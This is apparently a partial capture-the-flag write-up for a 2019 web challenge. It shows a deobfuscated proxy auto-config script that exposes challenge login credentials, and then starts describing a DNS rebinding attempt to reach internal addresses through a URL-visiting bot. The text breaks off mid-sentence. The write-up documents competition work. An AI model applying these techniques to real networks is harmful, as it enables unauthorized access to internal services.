Category: Web Points: 137 Solves: 34 ## Description ``` On our corporate network, the only overflow is the Order of the Overflow. <a href="https://s3.us-east-2.amazonaws.com/oooverflow-challs/b48fb18a0837e8e6840d5101ff44bb9ee5ee1d22846580487ccce756b966f6b2/info.pac">info.pac</a> ``` ## Write-up ### 1. javascript deobfuscate. Change `eval` to `console.log`. ```js FindProxyForURL = function(url, host) { /* The only 'overflow' that employees can access is the Order of the Overflow. Log in with OnlyOne:Overflow. HTTPS support is coming soon. */ if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT'; return 'PROXY ooops.quals2019.oooverflow.io:8080'; } ``` we can access challenge page ! ### 2. DNS Rebinding. if you send a URL, the bot access to the URL. And you look at the referer of http header, you can see that it starts from the internal IP address. (ex: 10.x.x.x) I tried DNS rebinding. I could not access the internal